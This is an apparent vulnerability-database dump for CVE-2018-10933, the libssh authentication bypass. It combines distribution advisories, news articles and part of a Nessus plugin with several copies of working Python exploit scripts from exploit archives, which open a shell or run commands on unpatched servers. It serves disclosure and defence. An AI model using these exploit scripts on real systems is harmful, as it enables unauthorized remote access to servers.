authentciate\n\t without any credentials.\n\n", "edition": 3, "modified": "2018-10-16T00:00:00", "published": "2018-10-16T00:00:00", "id": "2383767C-D224-11E8-9623-A4BADB2F4699", "href": "https://vuxml.freebsd.org/freebsd/2383767c-d224-11e8-9623-a4badb2f4699.html", "title": "libssh -- authentication bypass vulnerability", "type": "freebsd", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}], "threatpost": [{"lastseen": "2019-07-03T05:58:33", "bulletinFamily": "info", "cvelist": ["CVE-2018-10933"], "description": "The libssh open-source project has issued an update to address an authentication bypass vulnerability in the server code \u2014 to say that it\u2019s trivial to exploit is an understatement.\n\nThe flaw (CVE-2018-10933) exists in libssh versions 0.6 and above being used in server mode \u2013 and it allows anyone to authenticate to a server without any credentials, simply by telling the system that they\u2019re a legitimate user.\n\nAn attack can be carried out \u201cby presenting the server an SSH2_MSG_USERAUTH_SUCCESS message in place of the SSH2_MSG_USERAUTH_REQUEST message which the server would expect to initiate authentication,\u201d the project said in an [advisory](<https://www.libssh.org/2018/10/16/libssh-0-8-4-and-0-7-6-security-and-bugfix-release/>) on Tuesday.\n\nThe revelation sparked dismay among coders.\n\n> Holy shit.\n> \n> I don't know much about this protocol, but if I understand it correctly, you can just claim \"yeah I'm logged in no need to verify\" and it will work? Jesus Christ\u2026\n> \n> \u2014 /dev/sam1 (@samvdkris) [October 16, 2018](<https://twitter.com/samvdkris/status/1052266808365985792?ref_src=twsrc%5Etfw>)\n\nSome have called it the equivalent of a Jedi mind trick: Simply tell the system that things are fine, and it will think that things are fine \u2013 i.e., \u201cThese are not the droids you\u2019re looking for.\u201d\n\nTo put things in perspective, it should be noted that libssh is a multiplatform C library implementing the SSHv2 protocol, which is used by developers in a number of ways: It allows users to remotely execute programs, transfer files, use a secure and transparent tunnel, manage public keys and so on.\n\nAs such, a malicious exploit would allow an attacker to gain complete control over vulnerable servers to wreak havoc, such as installing rootkits, stealing encryption keys, intercepting file transfers and server requests, and dropping backdoors or other binaries.\n\nIn terms of how serious of a flaw this is by the numbers affected, the scope of the issue is unclear. A search on the Shodan search engine by Amit Serper, head of research at security company Cybereason, filtered the results by servers using the default SSH port. He took to Twitter showing that he [uncovered](<https://twitter.com/0xAmit/status/1052251871392555013/photo/1>) 3,336 servers using vulnerable versions of the library.\n\nProjects publicly stating that they use the libssh include KDE, which uses it to implement the sftp module to allow secure file transfers between different computers; and KDE X2Go, which uses the SSH library to secure the connection to a remote X desktop. But it\u2019s not immediately clear if these implementations are affected.\n\nThe good news is that two major projects that may have people concerned aren\u2019t subjected to the bug. GitHub, which uses libssh in production to power its git SSH infrastructure and serve millions of requests daily, is unaffected by the issue, [according to its security team](<https://twitter.com/GitHubSecurity/status/1052317333379723265>). They said via Twitter that GitHub uses a customized version on libssh with a different authentication method.\n\n> We use a custom version of libssh; SSH2_MSG_USERAUTH_SUCCESS with libssh server is not relied upon for pubkey-based auth, which is what we use the library for. Patches have been applied out of an abundance of caution, but GHE was never vulnerable to CVE-2018-10933.\n> \n> \u2014 GitHub Security (@GitHubSecurity) [October 17, 2018](<https://twitter.com/GitHubSecurity/status/1052358402842746880?ref_src=twsrc%5Etfw>)\n\nOpenSSH meanwhile doesn\u2019t use libssh at all.\n\nThe flaw is fixed with libssh versions 0.8.4 or 0.7.6, which can be [downloaded here](<https://www.libssh.org/files/>). Developers using server-mode implementations should do a careful audit of their systems to uncover any vulnerable instances.\n", "modified": "2018-10-17T17:08:41", "published": "2018-10-17T17:08:41", "id": "THREATPOST:FEA9B5AB90A62DAE20E065965E4FB381", "href": "https://threatpost.com/libssh-authentication-bypass-makes-it-trivial-to-pwn-rafts-of-servers/138399/", "type": "threatpost", "title": "libssh Authentication Bypass Makes it Trivial to Pwn Rafts of Servers", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}], "archlinux": [{"lastseen": "2020-09-22T18:36:41", "bulletinFamily": "unix", "cvelist": ["CVE-2018-10933"], "description": "Arch Linux Security Advisory ASA-201810-10\n==========================================\n\nSeverity: Critical\nDate : 2018-10-17\nCVE-ID : CVE-2018-10933\nPackage : libssh\nType : authentication bypass\nRemote : Yes\nLink : https://security.archlinux.org/AVG-780\n\nSummary\n=======\n\nThe package libssh before version 0.8.4-1 is vulnerable to\nauthentication bypass.\n\nResolution\n==========\n\nUpgrade to 0.8.4-1.\n\n# pacman -Syu \"libssh>=0.8.4-1\"\n\nThe problem has been fixed upstream in version 0.8.4.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\nAn authentication bypass vulnerability has been discovered in libssh\nversions prior to 0.7.6 and 0.8.4, in the server-side state machine. By\npresenting the server an SSH2_MSG_USERAUTH_SUCCESS message in place of\nthe SSH2_MSG_USERAUTH_REQUEST message which the server would expect to\ninitiate authentication, the attacker could successfully authenticate\nwithout any credentials, resulting in unauthorized access.\n\nImpact\n======\n\nA remote attacker is able to successfully authenticate without any\ncredentials, resulting in unauthorized access.\n\nReferences\n==========\n\nhttps://www.libssh.org/2018/10/16/libssh-0-8-4-and-0-7-6-security-and-bugfix-release/\nhttps://www.libssh.org/security/advisories/CVE-2018-10933.txt\nhttps://git.libssh.org/projects/libssh.git/commit/?id=2bddafeb709eacc80ad31fec40479f9b628a8bd7\nhttps://git.libssh.org/projects/libssh.git/commit/?id=825f4ba96407abe8cebb046a7503fa2bf5de9df6\nhttps://git.libssh.org/projects/libssh.git/commit/?id=20981bf2296202e95d7919394d4610ae3a876cfa\nhttps://git.libssh.org/projects/libssh.git/commit/?id=5d7414467d6dac100a93df761b06de5cd07fc69a\nhttps://git.libssh.org/projects/libssh.git/commit/?id=459868c4a57d2d11cf7835655a8d1a5cf034ccb4\nhttps://git.libssh.org/projects/libssh.git/commit/?id=68b0c7a93448123cc0d6a04d3df40d92a3fd0a67\nhttps://git.libssh.org/projects/libssh.git/commit/?id=75be012b4a14f4550ce6ad3f126e559f44dbde76\nhttps://git.libssh.org/projects/libssh.git/commit/?id=e1548a71bdac73da084174ab1d6d2713edd93f6e\nhttps://security.archlinux.org/CVE-2018-10933", "modified": "2018-10-17T00:00:00", "published": "2018-10-17T00:00:00", "id": "ASA-201810-10", "href": "https://security.archlinux.org/ASA-201810-10", "type": "archlinux", "title": "[ASA-201810-10] libssh: authentication bypass", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}], "slackware": [{"lastseen": "2020-10-25T16:36:03", "bulletinFamily": "unix", "cvelist": ["CVE-2018-10933"], "description": "New libssh packages are available for Slackware 14.0, 14.1, 14.2, and -current\nto fix a security issue.\n\n\nHere are the details from the Slackware 14.2 ChangeLog:\n\npatches/packages/libssh-0.7.6-i586-1_slack14.2.txz: Upgraded.\n Fixed authentication bypass vulnerability.\n For more information, see:\n https://www.libssh.org/2018/10/16/libssh-0-8-4-and-0-7-6-security-and-bugfix-release/\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10933\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/libssh-0.7.6-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/libssh-0.7.6-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/libssh-0.7.6-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/libssh-0.7.6-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/libssh-0.7.6-i586-1_slack14.2.txz\n\nUpdated package for Slackware x86_64 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/libssh-0.7.6-x86_64-1_slack14.2.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/libssh-0.7.6-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/libssh-0.7.6-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 14.0 package:\n132daeab4d33314c642cc11ed84a93b9 libssh-0.7.6-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 package:\ne4fe9892bafa9a8432b10f3c907759e9 libssh-0.7.6-x86_64-1_slack14.0.txz\n\nSlackware 14.1 package:\n95f7c0251472e8d189ccdbdaa228a429 libssh-0.7.6-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 package:\n1537ef4d99a40806e9838294c654e7ad libssh-0.7.6-x86_64-1_slack14.1.txz\n\nSlackware 14.2 package:\n4395d549c794aaf2a4ea1ce8c0cf5cb4 libssh-0.7.6-i586-1_slack14.2.txz\n\nSlackware x86_64 14.2 package:\n712fada9b823ed7982575cb89f0d709f libssh-0.7.6-x86_64-1_slack14.2.txz\n\nSlackware -current package:\n91ef4552de2c81098c9f5c3e0b1f0906 l/libssh-0.7.6-i586-1.txz\n\nSlackware x86_64 -current package:\n2cdb11e6bd6d140e0875d93aec1b0bac l/libssh-0.7.6-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg libssh-0.7.6-i586-1_slack14.2.txz", "modified": "2018-10-17T03:52:18", "published": "2018-10-17T03:52:18", "id": "SSA-2018-289-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2018&m=slackware-security.422705", "type": "slackware", "title": "[slackware-security] libssh", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}], "cisco": [{"lastseen": "2019-05-29T15:32:07", "bulletinFamily": "software", "cvelist": ["CVE-2018-10933"], "description": "A vulnerability in libssh could allow an unauthenticated, remote attacker to bypass authentication on a targeted system.\n\nThe vulnerability is due to improper authentication operations by the server-side state machine of the affected software. An attacker could exploit this vulnerability by presenting a SSH2_MSG_USERAUTH_SUCCESS message to a targeted system. A successful exploit could allow the attacker to bypass authentication and gain unauthorized access to a targeted system.\n\n This advisory is available at the following link:\nhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20181019-libssh [\"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20181019-libssh\"]", "modified": "2018-11-05T20:29:52", "published": "2018-10-19T16:00:00", "id": "CISCO-SA-20181019-LIBSSH", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20181019-libssh", "type": "cisco", "title": "libssh Authentication Bypass Vulnerability Affecting Cisco Products: October 2018", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}], "zdt": [{"lastseen": "2018-10-21T18:43:11", "description": "Exploit for linux platform in category remote exploits", "edition": 1, "published": "2018-10-19T00:00:00", "title": "libSSH - Authentication Bypass Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-10933"], "modified": "2018-10-19T00:00:00", "id": "1337DAY-ID-31367", "href": "https://0day.today/exploit/description/31367", "sourceData": "#!/usr/bin/env python3\r\nimport paramiko\r\nimport socket\r\nimport argparse\r\nfrom sys import argv, exit\r\n \r\n \r\nparser = argparse.ArgumentParser(description=\"libSSH Authentication Bypass\")\r\nparser.add_argument('--host', help='Host')\r\nparser.add_argument('-p', '--port', help='libSSH port', default=22)\r\nparser.add_argument('-log', '--logfile', help='Logfile to write conn logs', default=\"paramiko.log\")\r\n \r\nargs = parser.parse_args()\r\n \r\n \r\ndef BypasslibSSHwithoutcredentials(hostname, port):\r\n \r\n sock = socket.socket()\r\n try:\r\n sock.connect((str(hostname), int(port)))\r\n \r\n message = paramiko.message.Message()\r\n transport = paramiko.transport.Transport(sock)\r\n transport.start_client()\r\n \r\n message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)\r\n transport._send_message(message)\r\n \r\n spawncmd = transport.open_session()\r\n spawncmd.invoke_shell()\r\n return 0\r\n \r\n except paramiko.SSHException as e:\r\n print(\"TCPForwarding disabled on remote/local server can't connect. Not Vulnerable\")\r\n return 1\r\n except socket.error:\r\n print(\"Unable to connect.\")\r\n return 1\r\n \r\n \r\ndef main():\r\n paramiko.util.log_to_file(args.logfile)\r\n try:\r\n hostname = args.host\r\n port = args.port\r\n except:\r\n parser.print_help()\r\n exit(1)\r\n BypasslibSSHwithoutcredentials(hostname, port)\r\n \r\nif __name__ == '__main__':\r\n exit(main())\n\n# 0day.today [2018-10-21] #", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}, "sourceHref": "https://0day.today/exploit/31367"}], "packetstorm": [{"lastseen": "2019-02-05T10:59:30", "description": "", "published": "2019-02-03T00:00:00", "type": "packetstorm", "title": "LibSSH 0.7.6 / 0.8.4 Unauthorized Access", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-10933"], "modified": "2019-02-03T00:00:00", "id": "PACKETSTORM:151477", "href": "https://packetstormsecurity.com/files/151477/LibSSH-0.7.6-0.8.4-Unauthorized-Access.html", "sourceData": "`#!/usr/bin/env python3 \nimport sys \nimport paramiko \nimport socket \nimport logging \n \n# pip3 install paramiko==2.0.8 \n \n#logging.basicConfig(stream=sys.stdout, level=logging.DEBUG) \nlogging.basicConfig(stream=sys.stdout) \nbufsize = 2048 \n \n \n \ndef execute(hostname, port, command): \nsock = socket.socket() \ntry: \nsock.connect((hostname, int(port))) \n \nmessage = paramiko.message.Message() \ntransport = paramiko.transport.Transport(sock) \ntransport.start_client() \n \nmessage.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS) \ntransport._send_message(message) \n \nclient = transport.open_session(timeout=10) \nclient.exec_command(command) \n \n# stdin = client.makefile(\"wb\", bufsize) \nstdout = client.makefile(\"rb\", bufsize) \nstderr = client.makefile_stderr(\"rb\", bufsize) \n \noutput = stdout.read() \nerror = stderr.read() \n \nstdout.close() \nstderr.close() \n \nreturn (output+error).decode() \nexcept paramiko.SSHException as e: \nlogging.exception(e) \nlogging.debug(\"TCPForwarding disabled on remote server can't connect. Not Vulnerable\") \nexcept socket.error: \nlogging.debug(\"Unable to connect.\") \n \nreturn None \n \n \nif __name__ == '__main__': \nprint(execute(sys.argv[1], sys.argv[2], sys.argv[3])) \n`\n", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/151477/libssh076084-access.txt"}, {"lastseen": "2018-10-20T10:15:48", "description": "", "published": "2018-10-19T00:00:00", "type": "packetstorm", "title": "libSSH Authentication Bypass", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-10933"], "modified": "2018-10-19T00:00:00", "id": "PACKETSTORM:149865", "href": "https://packetstormsecurity.com/files/149865/libSSH-Authentication-Bypass.html", "sourceData": "`#!/usr/bin/env python3 \nimport paramiko \nimport socket \nimport argparse \nfrom sys import argv, exit \n \n \nparser = argparse.ArgumentParser(description=\"libSSH Authentication Bypass\") \nparser.add_argument('--host', help='Host') \nparser.add_argument('-p', '--port', help='libSSH port', default=22) \nparser.add_argument('-log', '--logfile', help='Logfile to write conn logs', default=\"paramiko.log\") \n \nargs = parser.parse_args() \n \n \ndef BypasslibSSHwithoutcredentials(hostname, port): \n \nsock = socket.socket() \ntry: \nsock.connect((str(hostname), int(port))) \n \nmessage = paramiko.message.Message() \ntransport = paramiko.transport.Transport(sock) \ntransport.start_client() \n \nmessage.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS) \ntransport._send_message(message) \n \nspawncmd = transport.open_session() \nspawncmd.invoke_shell() \nreturn 0 \n \nexcept paramiko.SSHException as e: \nprint(\"TCPForwarding disabled on remote/local server can't connect. Not Vulnerable\") \nreturn 1 \nexcept socket.error: \nprint(\"Unable to connect.\") \nreturn 1 \n \n \ndef main(): \nparamiko.util.log_to_file(args.logfile) \ntry: \nhostname = args.host \nport = args.port \nexcept: \nparser.print_help() \nexit(1) \nBypasslibSSHwithoutcredentials(hostname, port) \n \nif __name__ == '__main__': \nexit(main()) \n \n`\n", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/149865/libssh-bypass.txt"}], "thn": [{"lastseen": "2018-10-17T12:23:38", "bulletinFamily": "info", "cvelist": ["CVE-2018-10933"], "description": "[](<https://1.bp.blogspot.com/-JmSpzcCH8e4/W8cO1b8ye9I/AAAAAAAAyaE/LuyFHB5dVIwDgXeLP6TQb1aMu2AzMaATgCLcBGAs/s728-e100/libssh-ssh-protocol-library-min.png>)\n\nA four-year-old severe vulnerability has been discovered in the Secure Shell (SSH) implementation library known as **Libssh **that could allow anyone to completely bypass authentication and gain unfettered administrative control over a vulnerable server without requiring a password. \n \nThe security vulnerability, tracked as **CVE-2018-10933**, is an authentication-bypass issue that was introduced in Libssh version 0.6 released earlier 2014, leaving thousands of enterprise servers open to hackers for the last four years. \n \nBut before you get frightened, you should know that neither the widely used OpenSSH nor Github's implementation of libssh was affected by the vulnerability. \n \nThe vulnerability resides due to a coding error in Libssh and is \"ridiculously simple\" to exploit. \n\n\n \nAccording to a security advisory [published](<https://www.libssh.org/2018/10/16/libssh-0-8-4-and-0-7-6-security-and-bugfix-release/>) Tuesday, all an attacker needs to do is sending an \"SSH2_MSG_USERAUTH_SUCCESS\" message to a server with an SSH connection enabled when it expects an \"SSH2_MSG_USERAUTH_REQUEST\" message. \n \nDue to a logical flaw in libssh, the library fails to validate if the incoming \u201csuccessful login\u201d packet was sent by the server or the client, and also fails to check if the authentication process has been completed or not. \n \nTherefore, if a remote attacker (client) sends this \"SSH2_MSG_USERAUTH_SUCCESS\" response to libssh, it considers that the authentication has been successful and will grant the attacker access to the server, without needing to enter a password. \n \nAlthough GitHub uses libssh, it confirms that its official website and GitHub Enterprise are not affected by the vulnerability due to how GitHub uses the library. \n\n\n> \"We use a custom version of libssh; SSH2_MSG_USERAUTH_SUCCESS with the libssh server is not relied upon for pubkey-based auth, which is what we use the library for,\" a GitHub security official [said](<https://twitter.com/GitHubSecurity/status/1052358402842746880>) on Twitter.\n\n> \"Patches have been applied out of an abundance of caution, but GHE [GitHub Enterprise] was never vulnerable to CVE-2018-10933.\"\n\nShodan search shows that around 6,500 internet-facing servers may be impacted due to the use of Libssh one or the other way. \n\n\n \nThe security bug was discovered by Peter Winter-Smith from NCC Group, who responsibly disclosed the issue to Libssh. \n \nThe Libssh team addressed the issue with the release of its updated libssh versions 0.8.4 and 0.7.6 on Tuesday, and the details of the vulnerability were also released at the same time. \n \nIf you have Libssh installed on your website, and mainly if you are using the server component, you are highly recommended to install the updated versions of Libssh as soon as possible. \n\n\nHave something to say about this article? Comment below or share it with us on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter](<https://twitter.com/thehackersnews>) or our [LinkedIn Group](<https://www.linkedin.com/company/the-hacker-news/>).\n", "modified": "2018-10-17T10:39:34", "published": "2018-10-17T10:39:00", "id": "THN:964B5C1CA23FD1DE427C22FC59CD0AEC", "href": "https://thehackernews.com/2018/10/libssh-ssh-protocol-library.html", "type": "thn", "title": "LibSSH Flaw Allows Hackers to Take Over Servers Without Password", "cvss": {"score": 0.0, "vector": "NONE"}}], "ubuntu": [{"lastseen": "2020-07-08T23:32:05", "bulletinFamily": "unix", "cvelist": ["CVE-2018-10933"], "description": "USN-3795-1 fixed a vulnerability in libssh. This update provides the \ncorresponding update for Ubuntu 18.10.\n\nOriginal advisory details:\n\nPeter Winter-Smith discovered that libssh incorrectly handled \nauthentication when being used as a server. A remote attacker could use \nthis issue to bypass authentication without any credentials.", "edition": 3, "modified": "2018-10-22T00:00:00", "published": "2018-10-22T00:00:00", "id": "USN-3795-2", "href": "https://ubuntu.com/security/notices/USN-3795-2", "title": "libssh vulnerability", "type": "ubuntu", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2020-07-02T11:33:41", "bulletinFamily": "unix", "cvelist": ["CVE-2018-10933"], "description": "Peter Winter-Smith discovered that libssh incorrectly handled \nauthentication when being used as a server. A remote attacker could use \nthis issue to bypass authentication without any credentials.", "edition": 3, "modified": "2018-10-17T00:00:00", "published": "2018-10-17T00:00:00", "id": "USN-3795-1", "href": "https://ubuntu.com/security/notices/USN-3795-1", "title": "libssh vulnerability", "type": "ubuntu", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}], "exploitdb": [{"lastseen": "2018-11-27T20:20:00", "description": "libSSH - Authentication Bypass. CVE-2018-10933. Remote exploit for Linux platform", "published": "2018-10-18T00:00:00", "type": "exploitdb", "title": "libSSH - Authentication Bypass", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-10933"], "modified": "2018-10-18T00:00:00", "id": "EDB-ID:45638", "href": "https://old.exploit-db.com/exploits/45638/", "sourceData": "#!/usr/bin/env python3\r\nimport paramiko\r\nimport socket\r\nimport argparse\r\nfrom sys import argv, exit\r\n\r\n\r\nparser = argparse.ArgumentParser(description=\"libSSH Authentication Bypass\")\r\nparser.add_argument('--host', help='Host')\r\nparser.add_argument('-p', '--port', help='libSSH port', default=22)\r\nparser.add_argument('-log', '--logfile', help='Logfile to write conn logs', default=\"paramiko.log\")\r\n\r\nargs = parser.parse_args()\r\n\r\n\r\ndef BypasslibSSHwithoutcredentials(hostname, port):\r\n \r\n sock = socket.socket()\r\n try:\r\n sock.connect((str(hostname), int(port)))\r\n\r\n message = paramiko.message.Message()\r\n transport = paramiko.transport.Transport(sock)\r\n transport.start_client()\r\n \r\n message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)\r\n transport._send_message(message)\r\n \r\n spawncmd = transport.open_session()\r\n spawncmd.invoke_shell()\r\n return 0\r\n \r\n except paramiko.SSHException as e:\r\n print(\"TCPForwarding disabled on remote/local server can't connect. Not Vulnerable\")\r\n return 1\r\n except socket.error:\r\n print(\"Unable to connect.\")\r\n return 1\r\n\r\n\r\ndef main():\r\n paramiko.util.log_to_file(args.logfile)\r\n try:\r\n hostname = args.host\r\n port = args.port\r\n except:\r\n parser.print_help()\r\n exit(1)\r\n BypasslibSSHwithoutcredentials(hostname, port)\r\n\r\nif __name__ == '__main__':\r\n exit(main())", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}, "sourceHref": "https://old.exploit-db.com/download/45638/"}, {"lastseen": "2019-02-03T21:05:55", "description": "", "published": "2018-10-20T00:00:00", "type": "exploitdb", "title": "LibSSH 0.7.6 / 0.8.4 - Unauthorized Access", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-10933"], "modified": "2018-10-20T00:00:00", "id": "EDB-ID:46307", "href": "https://www.exploit-db.com/exploits/46307", "sourceData": "#!/usr/bin/env python3\r\nimport sys\r\nimport paramiko\r\nimport socket\r\nimport logging\r\n\r\n# pip3 install paramiko==2.0.8\r\n\r\n#logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)\r\nlogging.basicConfig(stream=sys.stdout)\r\nbufsize = 2048\r\n\r\n\r\n\r\ndef execute(hostname, port, command):\r\n sock = socket.socket()\r\n try:\r\n sock.connect((hostname, int(port)))\r\n\r\n message = paramiko.message.Message()\r\n transport = paramiko.transport.Transport(sock)\r\n transport.start_client()\r\n\r\n message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)\r\n transport._send_message(message)\r\n\r\n client = transport.open_session(timeout=10)\r\n client.exec_command(command)\r\n\r\n # stdin = client.makefile(\"wb\", bufsize)\r\n stdout = client.makefile(\"rb\", bufsize)\r\n stderr = client.makefile_stderr(\"rb\", bufsize)\r\n\r\n output = stdout.read()\r\n error = stderr.read()\r\n\r\n stdout.close()\r\n stderr.close()\r\n\r\n return (output+error).decode()\r\n except paramiko.SSHException as e:\r\n logging.exception(e)\r\n logging.debug(\"TCPForwarding disabled on remote server can't connect. Not Vulnerable\")\r\n except socket.error:\r\n logging.debug(\"Unable to connect.\")\r\n\r\n return None\r\n\r\n\r\nif __name__ == '__main__':\r\n print(execute(sys.argv[1], sys.argv[2], sys.argv[3]))", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/46307"}], "nessus": [{"lastseen": "2021-01-07T08:59:37", "description": "According to the version of the libssh package installed, the EulerOS\ninstallation on the remote host is affected by the following\nvulnerability :\n\n - A vulnerability was found in libssh's server-side state\n machine before versions 0.7.6 and 0.8.4. A malicious\n client could create channels without first performing\n authentication, resulting in unauthorized\n access.(CVE-2018-10933)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 12, "cvss3": {"score": 9.1, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"}, "published": "2019-09-24T00:00:00", "title": "EulerOS 2.0 SP3 : libssh (EulerOS-SA-2019-2067)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-10933"], "modified": "2019-09-24T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:libssh", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2019-2067.NASL", "href": "https://www.tenable.com/plugins/nessus/129260", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(129260);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2018-10933\"\n );\n\n script_name(english:\"EulerOS 2.0 SP3 : libssh (EulerOS-SA-2019-2067)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the libssh package installed, the EulerOS\ninstallation on the remote host is affected by the following\nvulnerability :\n\n - A vulnerability was found in libssh's server-side state\n machine before versions 0.7.6 and 0.8.4. A malicious\n client could create channels without first performing\n authentication, resulting in unauthorized\n access.(CVE-2018-10933)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-2067\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6d5b9635\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected libssh package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/09/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/09/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libssh\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(3)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP3\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP3\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) 